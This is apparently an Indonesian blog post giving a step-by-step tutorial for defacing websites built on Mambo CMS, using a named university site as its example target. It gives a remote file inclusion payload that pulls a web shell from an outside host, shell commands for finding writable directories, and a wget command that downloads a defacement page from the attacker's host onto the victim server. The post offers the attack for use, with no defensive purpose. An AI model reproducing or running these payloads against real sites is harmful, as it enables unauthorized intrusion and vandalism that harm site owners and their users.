Deface situs Mambo
Disini kamu musti usaha sendiri mencari target nya.
Langkah-langkah nya :
1. http://sukan.upm.edu.my/Buletin/index.php?option=com_content&task=view&id=17&Itemid=2
2. Kemudian hapus/delete option=com_content&task=view&id=17&Itemid=2 di url/browsing sehingga menjadi http://sukan.upm.edu.my/Buletin/index.php?
3. Masukkan bug ini di belakang situs tadi :
_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=
4. Masukkan file inject ini di belakang nya lagi :
http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm
Misal nya http://sukan.upm.edu.my/Buletin/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://k.domaindlx.com/jambihackerlinkcrew/sql2.htm?
5. Di kolom Execute Command ketik :
find / -perm 777 -type d atau find / -perm 755 -type d
Tunggu beberapa saat.......
6. Kalo foldernya Permision Denied berarti kita tidak bisa apa2 di folder itu. Cari folder yg tidak ada tulisan Permision Denied.
Contoh Permision Denied :
find: /var/tux: Permission denied
find: /var/gdm: Permission denied
find: /tmp/ssh-XXcnJoE9: Permission denied
find: /tmp/orbit-root: Permission denied
Kita cari yg lain tapi usahakan foldernya yg /var/www/ kalo tidak ada juga tidak apa2.
Contoh folder yg bisa : /opt/orion
7. Masukkan file deface ini :
http://k.domaindlx.com/jambihackerlinkcrew/jh.htm
8. Di kolom Execute Command ketik :
cd /opt/orion;wget http://k.domaindlx.com/jambihackerlinkcrew/jh.htm
Tunggu beberapa saat.......
10:35:02 (4 KB/s) - `jh.htm' saved
Itu artinya sukses ke save
9. Cara lihat hasil nya :
http://sukan.upm.edu.my/Buletin/opt/orion/[file deface tadi]
10. Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi, misal nya : http://sukan.upm.edu.my/Buletin/opt/orion/jh.htm
Kalo nggak ada hasil nya coba klik tab Refresh yg ada diatas disamping url/browsing.
No comments:
Post a Comment